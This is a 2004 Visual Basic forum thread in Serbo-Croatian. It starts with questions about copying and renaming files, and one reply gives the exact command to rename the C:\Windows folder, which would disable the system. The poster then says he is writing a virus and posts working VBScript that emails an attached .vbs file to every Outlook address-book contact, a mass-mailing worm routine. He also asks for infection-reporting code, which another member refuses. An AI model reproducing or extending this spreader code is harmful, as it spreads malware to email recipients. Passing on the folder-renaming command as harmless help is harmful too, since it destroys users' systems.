Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Source cod za kopiranje fajlova????

[es] :: Visual Basic 6 :: Source cod za kopiranje fajlova????

[ Pregleda: 4141 | Odgovora: 7 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

VRKY

Član broj: 21087
Poruke: 4690
*.net.htnet.hr



+8 Profil

icon Source cod za kopiranje fajlova????03.04.2004. u 21:01 - pre 204 meseci
Zanima me neki sourc cod za kopiranje fajlova i da ih moj program zaljepi di ja hoću napr. C:\WINDOWS\NOTEPAD.exe da se kopira u C:\Program Files
 
Odgovor na temu

degojs

Član broj: 4716
Poruke: 5096



+51 Profil

icon Re: Source cod za kopiranje fajlova????03.04.2004. u 21:10 - pre 204 meseci
Pogledaj TOP temu "File System Object - rad sa fajlovima i folderima" i obrati pažnju na poslednju poruku u temi koja, između ostalog, pominje:

Citat:

Metode za rad sa fajlovima
-CopyFile

Commercial-Free !!!
 
Odgovor na temu

VRKY

Član broj: 21087
Poruke: 4690
*.net.htnet.hr



+8 Profil

icon Re: Source cod za kopiranje fajlova????04.04.2004. u 14:25 - pre 204 meseci
Našao sam,a zna li ko source za preimenovamje fajlova
 
Odgovor na temu

Marko_L
Beograd

Član broj: 20532
Poruke: 2885
*.yubc.net

Jabber: Marko_L@elitesecurity.org


+828 Profil

icon Re: Source cod za kopiranje fajlova????04.04.2004. u 14:29 - pre 204 meseci
Code:
Name [ime fajla] As [novo ime fajla]

-Odracuonogakomijedrpiorazmaknicu.
-Ne rxdi mi txstxturx, kxd god hocu dx
ukucxm "x" onx ukucx "x".
-Ko kaaz e da ja neuummem da kuuca
m.
-Piše "Insert disk 3", a jedva sam i ova
dva ugurao u drajv
-Postoje samo dve osobe kojima
verujem, jedna sam ja, a druga nisi ti
 
Odgovor na temu

VRKY

Član broj: 21087
Poruke: 4690
*.net.htnet.hr



+8 Profil

icon Re: Source cod za kopiranje fajlova????04.04.2004. u 14:33 - pre 204 meseci
Kako napr ako hoću preimenovati Windows u Windows2
 
Odgovor na temu

VRKY

Član broj: 21087
Poruke: 4690
*.net.htnet.hr



+8 Profil

icon Re: Source cod za kopiranje fajlova????04.04.2004. u 14:37 - pre 204 meseci
I usput zan li ko koji sourc za širenje e-mailom,ja imam neki ali ne znam gde se moj "Virs" gnjezdi pa ne znam što da stavim u Attachments.Ovo je primer sourca kojeg ja imam,i cuo sam da ima sourc ,koji me obavještava ko se s mojim "Virom"zarazio,zna li ga tko.??
Code:
On Error Resume Next
Dim Mail, cAddresses, Address, App, MAPI
Set App = CreateObject("Outlook.Application")
Set MAPI = App.GetNameSpace("MAPI")
For Each cAddresses In MAPI.AddressLists
For Each Address In cAddresses.AddressEntries
Set Mail = App.CreateItem(0)
Mail.Recipients.Add Address
Mail.Subject = "subjekt" 
Mail.Body = "bodybodybody poruke" 
Mail.Attachments.Add("C:\aaa5421.vbs") 
Mail.Send
Next
Next
 
Odgovor na temu

Marko_L
Beograd

Član broj: 20532
Poruke: 2885
*.yubc.net

Jabber: Marko_L@elitesecurity.org


+828 Profil

icon Re: Source cod za kopiranje fajlova????04.04.2004. u 15:03 - pre 204 meseci
Citat:
Kako napr ako hoću preimenovati Windows u Windows2

Pa kao sto sam rekao, pomocu funkicije Name.Ako ti se windows nalazi na C: onda:
Code:
Name "C:\Windows" As "C:\Windows2"

Citat:
i cuo sam da ima sourc ,koji me obavještava ko se s mojim "Virom"zarazio,zna li ga tko.??

To je nelegalno i nemoralno, a virusi su opasni po zdravlje kompjutera.
-Odracuonogakomijedrpiorazmaknicu.
-Ne rxdi mi txstxturx, kxd god hocu dx
ukucxm "x" onx ukucx "x".
-Ko kaaz e da ja neuummem da kuuca
m.
-Piše "Insert disk 3", a jedva sam i ova
dva ugurao u drajv
-Postoje samo dve osobe kojima
verujem, jedna sam ja, a druga nisi ti
 
Odgovor na temu

VRKY

Član broj: 21087
Poruke: 4690
*.net.htnet.hr



+8 Profil

icon Re: Source cod za kopiranje fajlova????04.04.2004. u 15:13 - pre 204 meseci
Hvala.
 
Odgovor na temu

[es] :: Visual Basic 6 :: Source cod za kopiranje fajlova????

[ Pregleda: 4141 | Odgovora: 7 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.